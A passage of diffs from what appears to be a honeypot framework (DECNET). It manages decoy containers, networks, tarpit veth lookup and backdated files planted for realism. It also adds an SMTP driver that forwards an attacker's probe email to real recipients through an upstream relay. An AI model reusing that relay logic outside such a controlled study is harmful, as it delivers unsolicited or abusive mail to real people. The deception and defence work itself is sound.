            "%s: buildx wedge detected; retrying with DOCKER_BUILDKIT=0 "
            "(legacy builder). Recover the buildx state at your leisure: "
            "rm -rf ~/.docker/buildx/activity && "
            "docker buildx create --name decnet-builder --use --bootstrap",
            label,
        )
    else:
        return

    # Deliberately outside the except block, so a failing second attempt
    # does not surface with the first failure chained as its context.
    await anyio.to_thread.run_sync(
        lambda: _invoke(env={"DOCKER_BUILDKIT": "0"}),
    )
def _decky_targets(decky_name: str, services: list[str]) -> list[str]:
    """List compose service names for one decky: the base, then its services.

    The base name comes first, followed by ``<decky>-<service>`` for
    every entry in *services* whose registry record is not flagged
    ``fleet_singleton``. Names the registry does not know are kept on
    purpose, so the subsequent compose call reports them instead of
    their being dropped silently.
    """
    from decnet.services.registry import get_service

    targets = [decky_name]
    for svc_name in services:
        try:
            entry = get_service(svc_name)
        except KeyError:
            # Unknown to the registry — keep it and let compose complain.
            keep = True
        else:
            keep = not entry.fleet_singleton
        if keep:
            targets.append(f"{decky_name}-{svc_name}")
    return targets
async def _live_topology_or_none(
    repo: Any, topology_id: str,
) -> Optional[dict[str, Any]]:
    """Fetch the topology only if live materialisation applies to it.

    ``None`` is returned — so callers need a single ``if`` — when:

    * ``repo.get_topology`` finds nothing;
    * the status is neither ``active`` nor ``degraded``;
    * ``target_host_uuid`` is set (agent-pinned); this case is also
      logged at info level.
    """
    topology = await repo.get_topology(topology_id)
    if topology is None or topology.status not in ("active", "degraded"):
        return None
    if not topology.target_host_uuid:
        return topology
    _log.info(
        "live decky op skipped (agent-pinned topology=%s); "
        "next agent push will reconcile",
        topology_id,
    )
    return None
async def _rerender_compose(repo: Any, topology_id: str) -> None:
    """Rewrite the per-topology compose file from the hydrated topology.

    Nothing is written when the topology hydrates to ``None``. A failure
    while writing the file is logged as a warning and swallowed, so it
    does not undo the DB-side mutation that preceded it.
    """
    from decnet.engine.deployer import _topology_compose_path
    from decnet.topology.compose import write_topology_compose

    snapshot = await hydrate(repo, topology_id)
    if snapshot is not None:
        try:
            write_topology_compose(snapshot, _topology_compose_path(topology_id))
        except Exception as exc:  # noqa: BLE001
            _log.warning(
                "live op: compose re-render failed topology=%s: %s",
                topology_id, exc,
            )
async def _materialise_decky_spawn(
    repo: Any, topology_id: str, decky_name: str, services: list[str],
) -> bool:
    """Bring up one decky (base + services) with ``up -d --no-deps --build``.

    The compose file is re-rendered first so it lists the new decky.

    Returns:
        True when the compose call completed without raising. False when
        it raised (the error is logged, not propagated) or when the
        topology is not eligible for live materialisation — so callers
        do not mark the decky ``running`` on the strength of a no-op.
    """
    eligible = await _live_topology_or_none(repo, topology_id)
    if eligible is None:
        return False

    from decnet.engine.deployer import _topology_compose_path

    await _rerender_compose(repo, topology_id)
    compose_targets = _decky_targets(decky_name, services)
    compose_path = _topology_compose_path(topology_id)
    try:
        await _compose_up_with_buildkit_fallback(
            "up", "-d", "--no-deps", "--build", *compose_targets,
            compose_file=compose_path,
            label=f"live add_decky topology={topology_id} decky={decky_name}",
        )
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live add_decky: compose up failed topology=%s decky=%s: %s",
            topology_id, decky_name, exc,
        )
        return False
    return True
async def _materialise_decky_remove(
    repo: Any, topology_id: str, decky_name: str, services: list[str],
) -> None:
    """Stop and ``rm -f`` one decky's containers, then re-render compose.

    Does nothing when the topology is not eligible for live
    materialisation. A failing compose step is logged as a warning and
    the remaining steps still run.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import anyio
    from decnet.engine.deployer import _compose, _topology_compose_path

    compose_targets = _decky_targets(decky_name, services)
    compose_path = _topology_compose_path(topology_id)

    # Both steps run BEFORE the re-render: the re-rendered file no
    # longer mentions the decky, so compose would find no service to
    # act on afterwards.
    steps = (
        (
            ("stop",),
            "live remove_decky: compose stop failed topology=%s decky=%s: %s",
        ),
        (
            ("rm", "-f"),
            "live remove_decky: compose rm failed topology=%s decky=%s: %s",
        ),
    )
    for verb, failure_message in steps:
        try:
            await anyio.to_thread.run_sync(
                lambda verb=verb: _compose(
                    *verb, *compose_targets, compose_file=compose_path,
                ),
            )
        except Exception as exc:  # noqa: BLE001
            _log.warning(failure_message, topology_id, decky_name, exc)

    await _rerender_compose(repo, topology_id)
async def _materialise_decky_connect(
    repo: Any, topology_id: str,
    decky_name: str, lan_name: str, ipv4_address: str,
) -> None:
    """Attach a decky's base container to a LAN network via the docker SDK.

    Only the base container is connected. Per the compose module,
    service containers use ``network_mode: service:<base>``, so they are
    expected to see the new interface without being iterated here.

    Does nothing when the topology is not eligible for live
    materialisation. SDK failures are logged, never raised; the compose
    file is re-rendered afterwards either way.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import docker
    from decnet.topology.compose import _container_name, _network_name

    net_name = _network_name(topology_id, lan_name)
    container_name = _container_name(topology_id, decky_name)
    try:
        client = docker.from_env()
        network = client.networks.get(net_name)
        base_container = client.containers.get(container_name)
        network.connect(base_container, ipv4_address=ipv4_address)
    except docker.errors.APIError as exc:
        text = str(exc).lower()
        # Idempotency — being on the network already is fine.
        already_attached = "already" in text or (
            "endpoint" in text and "exists" in text
        )
        if already_attached:
            _log.info(
                "live attach_decky: %s already on network %s — skipping",
                container_name, net_name,
            )
        else:
            _log.error(
                "live attach_decky: connect failed topology=%s decky=%s lan=%s: %s",
                topology_id, decky_name, lan_name, exc,
            )
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live attach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
            topology_id, decky_name, lan_name, exc,
        )
    await _rerender_compose(repo, topology_id)
async def _materialise_decky_disconnect(
    repo: Any, topology_id: str, decky_name: str, lan_name: str,
) -> None:
    """Detach a decky's base container from a LAN network via the docker SDK.

    Does nothing when the topology is not eligible for live
    materialisation. An API error whose text says the container is not
    connected (or that something no longer exists) is treated as
    already-done and logged at info level; other failures are logged as
    errors. Nothing is raised, and the compose file is re-rendered
    afterwards either way.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import docker
    from decnet.topology.compose import _container_name, _network_name

    net_name = _network_name(topology_id, lan_name)
    container_name = _container_name(topology_id, decky_name)
    try:
        client = docker.from_env()
        network = client.networks.get(net_name)
        base_container = client.containers.get(container_name)
        network.disconnect(base_container)
    except docker.errors.APIError as exc:
        text = str(exc).lower()
        already_detached = "not connected" in text or "no such" in text
        if already_detached:
            _log.info(
                "live detach_decky: %s already off network %s — skipping",
                container_name, net_name,
            )
        else:
            _log.error(
                "live detach_decky: disconnect failed topology=%s decky=%s lan=%s: %s",
                topology_id, decky_name, lan_name, exc,
            )
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live detach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
            topology_id, decky_name, lan_name, exc,
        )
    await _rerender_compose(repo, topology_id)
async def _materialise_decky_services_diff(
    repo: Any, topology_id: str,
    decky_name: str,
    added: list[str],
    removed: list[str],
) -> None:
    """Start added and stop/remove dropped service containers for one decky.

    Only the per-service containers are touched; the base container and
    sibling services are left alone. Does nothing when both lists are
    empty or when the topology is not eligible for live materialisation.
    Compose failures are logged and not raised.

    Follows the same up/down pattern as
    :mod:`decnet.engine.services_live` without importing it.
    """
    if not (added or removed):
        return
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import anyio
    from decnet.engine.deployer import _compose, _topology_compose_path

    await _rerender_compose(repo, topology_id)
    compose_path = _topology_compose_path(topology_id)

    # _decky_targets always leads with the base name; slice it off.
    add_targets = _decky_targets(decky_name, list(added))[1:]
    if add_targets:
        try:
            await _compose_up_with_buildkit_fallback(
                "up", "-d", "--no-deps", "--build", *add_targets,
                compose_file=compose_path,
                label=f"live update_decky add topology={topology_id} decky={decky_name}",
            )
        except Exception as exc:  # noqa: BLE001
            _log.error(
                "live update_decky add: compose up failed topology=%s decky=%s: %s",
                topology_id, decky_name, exc,
            )

    rm_targets = _decky_targets(decky_name, list(removed))[1:]
    if rm_targets:
        teardown = (("stop", ("stop",)), ("rm", ("rm", "-f")))
        for action_name, verb in teardown:
            try:
                await anyio.to_thread.run_sync(
                    lambda verb=verb: _compose(*verb, *rm_targets, compose_file=compose_path),  # type: ignore[misc]
                )
            except Exception as exc:  # noqa: BLE001
                _log.warning(
                    "live update_decky %s failed topology=%s decky=%s: %s",
                    action_name, topology_id, decky_name, exc,
                )
async def _materialise_decky_recreate_base(
    repo: Any, topology_id: str, decky_name: str,
) -> None:
    """Force-recreate only the decky's base container (forwards_l3 flips).

    DESTRUCTIVE: any in-container state on the base is lost. Gating this
    behind an explicit operator-supplied ``force=true`` is the caller's
    job; no such check happens here.

    Does nothing when the topology is not eligible for live
    materialisation. A compose failure is logged and not raised.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import anyio
    from decnet.engine.deployer import (
        _compose_with_retry, _topology_compose_path,
    )

    await _rerender_compose(repo, topology_id)
    compose_path = _topology_compose_path(topology_id)

    def _recreate_base():
        return _compose_with_retry(
            "up", "-d", "--no-deps", "--force-recreate", decky_name,
            compose_file=compose_path,
        )

    try:
        await anyio.to_thread.run_sync(_recreate_base)
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live update_decky recreate_base failed topology=%s decky=%s: %s",
            topology_id, decky_name, exc,
        )
# ------------------------------------------------------------------- ops
@@ -131,6 +588,16 @@ async def apply_add_lan(
"y": payload.get("y"),
}
)
# Live materialisation: when the topology is active/degraded, create
# the docker bridge network now and re-render the per-topology
# compose file so subsequent ``apply_add_decky`` writes a coherent
# services map. Pending topologies skip this — the next deploy
# creates everything from scratch. Agent-pinned topologies also
# skip; live editing on agents is its own routing problem.
await _materialise_lan_change(
repo, topology_id, created=(name, subnet, is_dmz),
)
await _assert_valid_after(repo, topology_id)
@@ -150,7 +617,17 @@ async def apply_remove_lan(
f"LAN {lan['name']!r} is the home LAN of decky "
f"{d['decky_config']['name']!r}; remove the decky first"
)
await repo.delete_lan(lan["id"])
lan_name = lan["name"]
# enforce_pending=False: the mutator queue is the live-editing
# surface, gated on topology status by us before we got here. The
# repo's pending-only guard is for HTTP CRUD callers that mustn't
# bypass it.
await repo.delete_lan(lan["id"], enforce_pending=False)
# Live materialisation symmetric to apply_add_lan: tear down the
# docker bridge and re-render compose so a future redeploy doesn't
# try to wire deckies into a network that no longer exists.
await _materialise_lan_change(repo, topology_id, removed=lan_name)
await _assert_valid_after(repo, topology_id)
@@ -204,11 +681,12 @@ async def apply_add_decky(
if forwards_l3:
decky_config["forwards_l3"] = True
services_list = list(payload.get("services", []))
decky_uuid = await repo.add_topology_decky(
{
"topology_id": topology_id,
"name": name,
"services": list(payload.get("services", [])),
"services": services_list,
"decky_config": decky_config,
"x": payload.get("x"),
"y": payload.get("y"),
@@ -223,6 +701,25 @@ async def apply_add_decky(
"forwards_l3": forwards_l3,
}
)
# Live materialisation: spawn the new decky's containers without
# touching siblings. Skips on pending / agent-pinned topologies —
# see _live_topology_or_none.
spawned = await _materialise_decky_spawn(
repo, topology_id, name, services_list,
)
# Flip the row's state to 'running' on success so the dashboard's
# ACTIVE DECKIES count reflects reality. Without this the row
# stays at the default 'pending' forever; the deployer's full
# post-deploy reconcile only runs on a fresh deploy_topology.
if spawned:
try:
await repo.update_topology_decky(decky_uuid, {"state": "running"})
except Exception as exc: # noqa: BLE001
_log.warning(
"live add_decky: state flip to running failed "
"topology=%s decky=%s: %s",
topology_id, name, exc,
)
await _assert_valid_after(repo, topology_id)
@@ -286,6 +783,16 @@ async def apply_attach_decky(
"forwards_l3": forwards_l3,
}
)
# Live materialisation: SDK network.connect on the base container.
# Service containers share the base's netns via network_mode:
# service:<base>, so they inherit the new interface — only the base
# needs the connect.
await _materialise_decky_connect(
repo, topology_id,
decky_name=decky["decky_config"]["name"],
lan_name=lan["name"],
ipv4_address=ip,
)
await _assert_valid_after(repo, topology_id)
@@ -329,7 +836,15 @@ async def apply_detach_decky(
await repo.update_topology_decky(
decky["uuid"], {"decky_config": new_cfg}
)
await repo.delete_topology_edge(edge["id"])
await repo.delete_topology_edge(edge["id"], enforce_pending=False)
# Live materialisation: SDK network.disconnect on the base
# container. Service containers automatically lose visibility into
# the LAN because they share the base's netns.
await _materialise_decky_disconnect(
repo, topology_id,
decky_name=decky["decky_config"]["name"],
lan_name=lan["name"],
)
await _assert_valid_after(repo, topology_id)
@@ -340,7 +855,15 @@ async def apply_remove_decky(
decky = _decky_by_name(hydrated, payload["decky"])
if decky is None:
raise MutationError(f"decky {payload['decky']!r} not found")
await repo.delete_topology_decky(decky["uuid"])
decky_name = decky["decky_config"]["name"]
services_list = list(decky.get("services") or [])
await repo.delete_topology_decky(decky["uuid"], enforce_pending=False)
# Live materialisation: stop + rm -f the decky's containers. We
# capture decky_name + services BEFORE the delete so the helper
# has the targets even though the row is gone.
await _materialise_decky_remove(
repo, topology_id, decky_name, services_list,
)
await _assert_valid_after(repo, topology_id)
@@ -354,31 +877,136 @@ async def apply_update_decky(
``patch`` — dict merged into existing ``decky_config``.
``services`` — replacement top-level services list.
``x``,``y`` — layout coords.
``force`` — opt-in for destructive recreates (currently
required when ``forwards_l3`` flips on a
live topology — see below).
Live materialisation strategy:
* **services changed** → diff old vs new; ``compose up -d`` for
added, ``compose stop`` + ``rm -f`` for removed. Mirrors the
direct API path (services_live) without coupling.
* **forwards_l3 flipped** → port publishing changes, which docker
can only apply at container-create time. Requires recreating
the base — destructive (kills in-container state, drops active
sessions). Gated on ``payload['force'] is True``; otherwise we
raise ``MutationError`` so a half-thinking operator doesn't
stomp a live decky.
* **only coords (x/y)** → DB-only. No docker work.
"""
hydrated = await _hydrated(repo, topology_id)
decky = _decky_by_name(hydrated, payload["decky"])
if decky is None:
raise MutationError(f"decky {payload['decky']!r} not found")
# Capture pre-state so we can compute the diff after the DB write.
old_services = list(decky.get("services") or [])
old_cfg = decky.get("decky_config") or {}
old_forwards_l3 = bool(old_cfg.get("forwards_l3", False))
patch: dict[str, Any] = {}
new_decky_config = old_cfg
if payload.get("patch"):
merged = dict(decky["decky_config"])
merged.update(payload["patch"])
patch["decky_config"] = merged
new_decky_config = {**old_cfg, **payload["patch"]}
patch["decky_config"] = new_decky_config
new_services = old_services
if "services" in payload:
patch["services"] = list(payload["services"])
new_services = list(payload["services"])
patch["services"] = new_services
for key in ("x", "y"):
if key in payload:
patch[key] = payload[key]
if not patch:
return
new_forwards_l3 = bool(new_decky_config.get("forwards_l3", False))
forwards_l3_flipped = new_forwards_l3 != old_forwards_l3
# Promotion path: refuse to flip a non-DMZ decky to gateway. The
# 'gateway' semantic specifically means 'host-port publisher facing
# the DMZ' — running it on an internal LAN publishes ports the
# outside world can't reach and shadows the host's port space.
# Generic L3-bridge forwards_l3 (internal multi-homing) is set by
# the generator/attach paths, not by this op, so this check only
# fires when the operator explicitly toggles the flag.
if forwards_l3_flipped and new_forwards_l3:
# Re-derive the home LAN from the edges; same logic as
# check_gateway_homed_in_dmz.
decky_uuid = decky["uuid"]
home_lan_id: Optional[str] = None
for e in hydrated["edges"]:
if e["decky_uuid"] == decky_uuid and e.get("is_bridge") is False:
home_lan_id = e["lan_id"]
break
if home_lan_id is None:
for e in hydrated["edges"]:
if e["decky_uuid"] == decky_uuid:
home_lan_id = e["lan_id"]
break
home_lan = next(
(lan for lan in hydrated["lans"] if lan["id"] == home_lan_id),
None,
)
if home_lan is None or not home_lan.get("is_dmz"):
home_name = home_lan["name"] if home_lan else "(unknown)"
raise MutationError(
f"cannot promote decky {decky['decky_config']['name']!r} "
f"to gateway: home LAN {home_name!r} is not a DMZ. "
"Move the decky to the DMZ first, or pick a different decky."
)
# Pre-check the destructive flip BEFORE any DB write, so a refused
# mutation leaves zero side-effects.
is_live = (await _live_topology_or_none(repo, topology_id)) is not None
if is_live and forwards_l3_flipped and not bool(payload.get("force")):
raise MutationError(
f"forwards_l3 flip on live decky "
f"{decky['decky_config']['name']!r} requires force=true; "
"this will recreate the base container and drop in-container state"
)
await repo.update_topology_decky(decky["uuid"], patch)
# Materialisation — only when the topology is actually live.
# _live_topology_or_none was already called above; calling the
# individual helpers re-checks (cheap) so they stay self-contained.
decky_name = decky["decky_config"]["name"]
added = sorted(set(new_services) - set(old_services))
removed = sorted(set(old_services) - set(new_services))
if added or removed:
await _materialise_decky_services_diff(
repo, topology_id, decky_name, added, removed,
)
if forwards_l3_flipped:
# force was checked above; reaching here means the operator
# opted in. recreate_base re-renders compose first so the
# rebuilt base picks up the new `ports:` block.
await _materialise_decky_recreate_base(
repo, topology_id, decky_name,
)
await _assert_valid_after(repo, topology_id)
async def apply_update_lan(
repo: Any, topology_id: str, payload: dict[str, Any]
) -> None:
"""Update LAN fields — subnet, is_dmz, coords, rename."""
"""Update LAN fields — subnet, is_dmz, coords, rename.
Guard rail: ``subnet`` and ``is_dmz`` are pinned at deploy time.
Live deckies bind to the bridge with IPs allocated from the old
subnet (and ``is_dmz`` flips swap the bridge's ``internal=False``
flag, which docker can't change on a network with active
containers). Reject those mutations on active/degraded topologies
rather than rewriting the DB into an incoherent state.
Coord-only updates (``x``/``y``) are layout-only; let them through
unconditionally. Renames pass through too — the bridge's docker
name is keyed off ``_network_name(topology_id, lan_name)``, so a
rename would also need a rebuild — but rename isn't currently a
code path on active topologies; if the operator hits it we still
write the row and let the next deploy reconcile.
"""
hydrated = await _hydrated(repo, topology_id)
lan = _lan_by_name(hydrated, payload["name"])
if lan is None:
@@ -389,6 +1017,17 @@ async def apply_update_lan(
fields[key] = payload[key]
if not fields:
return
topology = await repo.get_topology(topology_id)
is_live = bool(topology) and topology.status in ("active", "degraded")
if is_live:
hostile = {"subnet", "is_dmz"} & fields.keys()
if hostile:
raise MutationError(
f"cannot change {sorted(hostile)} on a deployed LAN; "
f"teardown + redeploy required"
)
await repo.update_lan(lan["id"], fields)
await _assert_valid_after(repo, topology_id)

View File

@@ -303,11 +303,44 @@ def remove_bridge_network(client: docker.DockerClient, name: str) -> None:
# Host-side macvlan interface (hairpin fix)
# ---------------------------------------------------------------------------
def _require_root() -> None:
if os.geteuid() != 0:
raise PermissionError(
"MACVLAN host-side interface setup requires root. Run with sudo."
)
# Linux capability bit positions — see capabilities(7).
_CAP_NET_ADMIN = 12
def _has_cap_net_admin() -> bool:
"""True if the current process holds CAP_NET_ADMIN in its effective set.
Reads ``/proc/self/status`` rather than calling ``capget(2)`` so we
don't need a libcap dependency. ``CapEff`` is a 64-bit hex bitmask;
bit 12 is CAP_NET_ADMIN.
"""
try:
with open("/proc/self/status", "r") as fh:
for line in fh:
if line.startswith("CapEff:"):
bits = int(line.split()[1], 16)
return bool(bits & (1 << _CAP_NET_ADMIN))
except OSError:
pass
return False
def _require_net_admin() -> None:
    """Fail fast when the process cannot create macvlan/ipvlan links.

    Passing requires either an effective UID of 0 or CAP_NET_ADMIN in the
    effective capability set (as reported by ``_has_cap_net_admin``). Checking
    the capability as well as the UID lets a non-root service that was granted
    the cap (e.g. systemd ``AmbientCapabilities=CAP_NET_ADMIN``) proceed
    without running the whole API as root.

    Raises:
        PermissionError: if neither condition holds.
    """
    privileged = os.geteuid() == 0 or _has_cap_net_admin()
    if not privileged:
        raise PermissionError(
            "MACVLAN host-side interface setup needs CAP_NET_ADMIN. "
            "Either run as root or grant the cap (systemd: "
            "AmbientCapabilities=CAP_NET_ADMIN)."
        )
def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None:
@@ -317,7 +350,9 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
host-helper first: the two drivers can share a parent NIC on paper but
leaving the opposite helper in place is just cruft after a driver swap.
"""
_require_root()
_require_net_admin()
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
@@ -332,7 +367,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
def teardown_host_macvlan(decky_ip_range: str) -> None:
_require_root()
_require_net_admin()
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False)
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
@@ -344,7 +379,9 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
host-helper first so a prior macvlan deploy doesn't leave its slave
dangling on the parent NIC after the driver swap.
"""
_require_root()
_require_net_admin()
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
@@ -358,7 +395,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
def teardown_host_ipvlan(decky_ip_range: str) -> None:
_require_root()
_require_net_admin()
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False)
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
@@ -378,3 +415,47 @@ def ips_to_range(ips: list[str]) -> str:
strict=False,
)
return str(network)
# ---------------------------------------------------------------------------
# Container veth resolution (for tc netem tarpit)
# ---------------------------------------------------------------------------
def get_container_pid(container_name: str) -> int:
    """Return the PID of a running container's init process.

    Args:
        container_name: Name (or ID) passed to the Docker SDK's
            ``containers.get``.

    Returns:
        The ``State.Pid`` value from the container's inspect attributes.

    Raises:
        LookupError: if the container does not exist, or if its recorded PID
            is falsy (Docker reports 0 for a container that is not running).
    """
    client = docker.from_env()
    try:
        try:
            container = client.containers.get(container_name)
        except docker.errors.NotFound as exc:
            raise LookupError(f"container {container_name!r} not found") from exc
        pid = container.attrs["State"]["Pid"]
    finally:
        # from_env() builds a fresh client with its own connection pool on
        # every call; close it so repeated lookups don't leak sockets.
        client.close()
    if not pid:
        raise LookupError(f"container {container_name!r} is not running (PID=0)")
    return pid
def get_container_veth(container_name: str) -> str:
    """Resolve the host-side interface paired with a container's ``eth0``.

    Two commands are run: ``docker exec <name> cat /sys/class/net/eth0/iflink``
    to learn the peer interface index, then ``ip link show`` on the host to
    find the line that starts with that index. Nothing beyond ``docker exec``
    and ``ip`` is invoked (no nsenter).

    Args:
        container_name: Container to inspect.

    Returns:
        The interface name from the matching ``ip link show`` line, with any
        ``@ifN`` suffix removed.

    Raises:
        LookupError: if the ``docker exec`` probe exits non-zero, or if no
            host link line carries the peer index.
    """
    probe = _run(
        ["docker", "exec", container_name, "cat", "/sys/class/net/eth0/iflink"],
        check=False,
    )
    if probe.returncode != 0:
        raise LookupError(
            f"container {container_name!r} not reachable: {probe.stderr.strip()}"
        )

    peer_index = probe.stdout.strip()
    index_prefix = f"{peer_index}:"
    host_rows = _run(["ip", "link", "show"]).stdout.splitlines()
    match = next((row for row in host_rows if row.startswith(index_prefix)), None)
    if match is None:
        raise LookupError(
            f"no host veth found for container {container_name!r} (peer ifindex {peer_index})"
        )
    # Row format: "42: veth3a4b5c@if41: <BROADCAST,...>" — the name is the
    # second colon-separated field, minus the "@ifN" peer annotation.
    name_field = match.split(":")[1].strip()
    return name_field.split("@")[0]

View File

@@ -0,0 +1,80 @@
"""SMTP probe-relay driver.
Forwards the attacker's first probe email via the master's real internet
connection. The smtp_relay decky runs on MACVLAN and has no gateway access;
the master (where this worker runs) does.
Called by the realism worker's smtp probe listener, not the main tick loop.
"""
from __future__ import annotations
import email
import smtplib
from pathlib import Path
from typing import Any
_ARTIFACTS_ROOT_DEFAULT = "/var/lib/decnet/artifacts"
def _ensure_from_header(body: bytes, mail_from: str) -> bytes:
"""Return body with a From: header added if one is absent."""
try:
msg = email.message_from_bytes(body)
except Exception:
return body
if msg["From"]:
return body
# Prepend the header before the existing content.
header_line = f"From: {mail_from}\r\n".encode()
return header_line + body
def forward_probe(
*,
svc_cfg: dict[str, Any],
stored_as: str,
decky_name: str,
mail_from: str,
rcpt_to: list[str],
artifacts_root: str = _ARTIFACTS_ROOT_DEFAULT,
) -> tuple[bool, str]:
"""Read the .eml from disk and forward it via the upstream relay.
Returns (True, "") on success or (False, reason) on failure.
Always safe to call in a thread — uses only blocking I/O.
"""
upstream_host = (svc_cfg.get("upstream_host") or "").strip()
if not upstream_host:
return False, "upstream_host not configured"
eml_path = Path(artifacts_root) / decky_name / "smtp" / stored_as
try:
body = eml_path.read_bytes()
except OSError as exc:
return False, f"cannot read eml: {exc}"
if not rcpt_to:
return False, "no recipients"
upstream_port = int(svc_cfg.get("upstream_port") or 25)
upstream_user = (svc_cfg.get("upstream_user") or "").strip()
upstream_pass = (svc_cfg.get("upstream_pass") or "").strip()
envelope_from = (svc_cfg.get("upstream_sender") or "").strip() or mail_from
# Ensure the message has a From: header so mail clients show the attacker's
# address rather than falling back to the envelope sender (upstream_sender).
# Minimal relay-test scripts often omit headers entirely.
body = _ensure_from_header(body, mail_from)
try:
with smtplib.SMTP(upstream_host, upstream_port, timeout=15) as conn:
conn.ehlo()
if conn.has_extn("STARTTLS"):
conn.starttls()
conn.ehlo()
if upstream_user and upstream_pass:
conn.login(upstream_user, upstream_pass)
conn.sendmail(envelope_from, rcpt_to, body)
return True, ""
except Exception as exc:
return False, str(exc)[:256]

View File

@@ -18,11 +18,8 @@ or IP can't escape into a shell.
from __future__ import annotations
import asyncio
import shlex
from typing import Any
import base64
from datetime import datetime, timezone
from datetime import datetime
from decnet.logging import get_logger
from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult
@@ -226,36 +223,24 @@ class SSHDriver(ActivityDriver):
) -> ActivityResult:
"""Write *content* to *path* inside *decky_name*'s ssh container.
Streams base64 via stdin (mirrors :mod:`decnet.canary.planter`'s
ARG_MAX-safe write — see commit c17b9e0). Sets file mode and,
when *mtime* is provided, ``touch -d`` to backdate the file so
it doesn't all stamp at wall-clock-now (the realism failure
this migration is fixing).
Delegates to :func:`decnet.decky_io.write_file_to_container`,
which carries the ARG_MAX-safe base64-via-stdin trick. Sets
file mode and, when *mtime* is provided, ``touch -d`` to
backdate the file (otherwise everything stamps at wall-clock-now
— the realism failure this path was originally fixing).
"""
from decnet.decky_io import write_file_to_container
container = _container_for(decky_name)
b64 = base64.b64encode(content).decode("ascii")
# touch -d accepts ISO 8601; we always emit UTC so the
# container's local TZ doesn't drift the mtime.
if mtime is not None:
ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
touch_cmd = f"touch -d {shlex.quote(ts)} {shlex.quote(path)}"
else:
touch_cmd = f"touch {shlex.quote(path)}"
sh_cmd = (
f"mkdir -p {shlex.quote(_dirname(path))} && "
f"base64 -d > {shlex.quote(path)} && "
f"chmod {mode:o} {shlex.quote(path)} && "
f"{touch_cmd}"
success, error = await write_file_to_container(
container, path, content, mode=mode, mtime=mtime, timeout=_TIMEOUT,
)
argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
rc, _stdout, stderr = await _run_with_stdin(argv, b64.encode("ascii"))
success = rc == 0
payload: dict[str, Any] = {
"dst_decky": decky_name,
"path": path,
"bytes": len(content),
"rc": rc,
"stderr": stderr.strip()[:256] if not success else None,
"rc": 0 if success else 1,
"stderr": error if not success else None,
}
return ActivityResult(success=success, payload=payload)
@@ -283,11 +268,3 @@ class SSHDriver(ActivityDriver):
)
def _dirname(path: str) -> str:
"""Pure-string dirname. We can't trust ``os.path.dirname`` on the
host to share the destination container's separator semantics, but
deckies are POSIX so a plain ``rfind('/')`` suffices."""
idx = path.rfind("/")
if idx <= 0:
return "/"
return path[:idx]

View File

@@ -175,7 +175,7 @@ async def pick(
)
return None
active = [p for p in personas if in_active_hours(p, now_dt.hour)]
active = [p for p in personas if in_active_hours(p, now_dt)]
if len(active) < 2:
logger.debug(
"emailgen pick: source=%s mail_decky=%s only %d personas in-hours",

View File

@@ -25,6 +25,7 @@ import secrets
from datetime import datetime, timezone
from typing import Any, Optional
from decnet.bus import topics as _topics
from decnet.bus.factory import get_bus
from decnet.bus.publish import (
publish_safely,
@@ -34,6 +35,7 @@ from decnet.bus.publish import (
from decnet.logging import get_logger
from decnet.orchestrator import events, scheduler
from decnet.orchestrator.drivers import get_driver_for
from decnet.orchestrator.drivers.smtp_relay import forward_probe
from decnet.orchestrator.emailgen import (
events as email_events,
scheduler as email_scheduler,
@@ -138,6 +140,9 @@ async def orchestrator_worker(
control_task = asyncio.create_task(
run_control_listener(bus, "orchestrator", shutdown),
)
probe_task = asyncio.create_task(
_run_smtp_probe_listener(repo, shutdown),
)
tick_n = 0
try:
while not shutdown.is_set():
@@ -157,7 +162,7 @@ async def orchestrator_worker(
if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0:
await _refresh_realism_config(repo)
finally:
for t in (heartbeat_task, control_task):
for t in (heartbeat_task, control_task, probe_task):
t.cancel()
with contextlib.suppress(Exception, asyncio.CancelledError):
await t
@@ -467,6 +472,100 @@ async def _bump_synthetic_file_after_edit(repo, action, result) -> None:
await repo.update_synthetic_file(action.synthetic_file_uuid, patch)
async def _run_smtp_probe_listener(
    repo: BaseRepository,
    shutdown: asyncio.Event,
) -> None:
    """Subscribe to smtp.probe.pending and forward probe emails upstream.

    Runs as a long-lived subtask alongside the tick loop. Each event's payload
    is handed to ``_handle_probe_pending``; a failure while handling one event
    is logged and the loop continues with the next event. A failure to reach
    the bus is logged and ends the listener. Cancellation is propagated.

    Args:
        repo: Repository passed through to ``_handle_probe_pending``.
        shutdown: Checked each time an event arrives; when set, the loop exits.
    """
    # Bound before the try so the finally block never touches an unassigned
    # name when get_bus() itself raises.
    bus = None
    try:
        bus = get_bus(client_name="orchestrator-probe")
        await bus.connect()
        sub = bus.subscribe(_topics.smtp("probe.pending"))
        async with sub:
            async for event in sub:
                if shutdown.is_set():
                    break
                try:
                    await _handle_probe_pending(repo, event.payload)
                except Exception as exc:  # noqa: BLE001
                    logger.warning("smtp probe listener: handle error: %s", exc)
    except asyncio.CancelledError:
        raise
